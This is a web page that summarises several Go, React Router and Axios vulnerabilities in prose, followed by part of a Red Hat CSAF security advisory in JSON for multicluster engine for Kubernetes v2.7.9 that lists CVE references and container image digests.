A flaw was found in database/sql. Concurrent queries can produce unexpected results when a query is cancelled during a Scan method call on returned Rows, creating a race condition. This vulnerability allows an attacker who can initiate and cancel queries to trigger this condition, possibly leading to inconsistent data being returned to the application.
A flaw was found in the archive/tar package in the Go standard library. tar.Reader does not set a maximum size on the number of sparse region data blocks in GNU tar pax 1.0 sparse files. A specially crafted tar archive with a pax header indicating a big number of sparse regions can cause a Go program to try to allocate a large amount of memory, causing an out-of-memory condition and resulting in a denial of service.
A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.
A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.
A cross site scripting flaw has been discovered in the npm react-router and @remix-run/router packages. React Router (and Remix v1/v2) SPA open navigation redirects originating from loaders or actions in Framework Mode, Data Mode, or the unstable RSC modes can result in unsafe URLs causing unintended javascript execution on the client. This is only an issue if you are creating redirect paths from untrusted content or via an open redirect.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
| URL | Category | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "The multicluster engine for Kubernetes 2.7 General Availability release images,\nwhich add new features and enhancements, bug fixes, and updated container images.",
"title": "Topic"
},
{
"category": "general",
"text": "The multicluster engine for Kubernetes v2.7 images\n\nThe multicluster engine for Kubernetes provides the foundational components\nthat are necessary for the centralized management of multiple\nKubernetes-based clusters across data centers, public clouds, and private\nclouds.\n\nYou can use the engine to create new Red Hat OpenShift Container Platform\nclusters or to bring existing Kubernetes-based clusters under management by\nimporting them. After the clusters are managed, you can use the APIs that\nare provided by the engine to distribute configuration based on placement\npolicy.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:5636",
"url": "https://access.redhat.com/errata/RHSA-2026:5636"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-13465",
"url": "https://access.redhat.com/security/cve/CVE-2025-13465"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-47907",
"url": "https://access.redhat.com/security/cve/CVE-2025-47907"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-58183",
"url": "https://access.redhat.com/security/cve/CVE-2025-58183"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61729",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-68121",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-22029",
"url": "https://access.redhat.com/security/cve/CVE-2026-22029"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_5636.json"
}
],
"title": "Red Hat Security Advisory: multicluster engine for Kubernetes v2.7.9 security update",
"tracking": {
"current_release_date": "2026-04-16T11:09:02+00:00",
"generator": {
"date": "2026-04-16T11:09:02+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:5636",
"initial_release_date": "2026-03-24T14:23:47+00:00",
"revision_history": [
{
"date": "2026-03-24T14:23:47+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-24T14:23:56+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T11:09:02+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "multicluster engine for Kubernetes 2.7",
"product": {
"name": "multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:multicluster_engine:2.7::el9"
}
}
}
],
"category": "product_family",
"name": "multicluster engine for Kubernetes"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"product_id": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"product_identification_helper": {
"purl": "pkg:oci/addon-manager-rhel9@sha256%3Afe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773970989"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"product_id": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel9@sha256%3A08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773185824"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"product_id": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/backplane-rhel9-operator@sha256%3A76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091107"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-api-provider-agent-rhel9@sha256%3A9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773445006"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-api-provider-kubevirt-rhel9@sha256%3Afb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773531423"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-curator-controller-rhel9@sha256%3A111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091098"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-image-set-controller-rhel9@sha256%3A694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091113"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-proxy-addon-rhel9@sha256%3Af02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091117"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-proxy-rhel9@sha256%3Adc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091011"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"product_id": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/clusterclaims-controller-rhel9@sha256%3A5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773873328"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"product_id": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"product_identification_helper": {
"purl": "pkg:oci/clusterlifecycle-state-metrics-rhel9@sha256%3A1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773639118"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"product_id": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/console-mce-rhel9@sha256%3A7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773100128"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"product_id": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/discovery-rhel9@sha256%3A50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091107"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"product_id": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hive-rhel9@sha256%3A6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773869889"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-addon-rhel9-operator@sha256%3A618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773688774"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-cli-rhel9@sha256%3A365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773398895"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-rhel9-operator@sha256%3A91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773398921"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"product_id": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"product_identification_helper": {
"purl": "pkg:oci/image-based-install-rhel9@sha256%3Ad6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773877068"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"product_id": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kube-rbac-proxy-mce-rhel9@sha256%3A9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773185866"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"product_id": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"product_identification_helper": {
"purl": "pkg:oci/managed-serviceaccount-rhel9@sha256%3A1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091077"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"product_id": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/managedcluster-import-controller-rhel9@sha256%3Ab22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091070"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"product_id": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multicloud-manager-rhel9@sha256%3A9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773741020"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"product_id": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"product_identification_helper": {
"purl": "pkg:oci/placement-rhel9@sha256%3Ad24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773970968"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"product_id": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/provider-credential-controller-rhel9@sha256%3A04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091099"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"product_id": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/registration-rhel9@sha256%3A3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773970964"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"product_id": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/registration-operator-rhel9@sha256%3A5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773970966"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"product_id": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/work-rhel9@sha256%3A2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773970968"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"product_id": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"product_identification_helper": {
